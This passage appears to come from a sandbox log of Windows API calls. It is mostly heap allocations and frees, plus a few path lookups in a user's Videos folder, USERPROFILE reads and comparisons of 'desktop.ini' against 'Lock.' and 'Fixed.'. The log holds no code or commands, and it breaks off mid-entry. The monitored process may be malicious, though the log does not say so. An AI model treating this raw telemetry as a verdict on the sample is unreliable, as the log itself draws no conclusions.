[0212.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5fba0 [0212.524] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/dbFeToW6SZRYrK03.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\dbFeToW6SZRYrK03.flv", lpFilePart=0x8cf650*="dbFeToW6SZRYrK03.flv") returned 0x2b [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fba0 | out: hHeap=0x2af0000) returned 1 [0212.524] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\dbFeToW6SZRYrK03.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dbfetow6szryrk03.flv")) returned 0xffffffff [0212.524] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.525] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0212.525] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.525] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0212.526] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0212.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0212.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0212.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa60d0 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0212.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0212.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0212.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.529] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0212.529] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0212.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0212.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0212.529] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0212.530] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0212.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74e60 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0212.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0212.532] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.532] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0212.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0212.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b88 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0212.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0212.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0212.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0212.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0212.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.535] RtlAllocateHeap 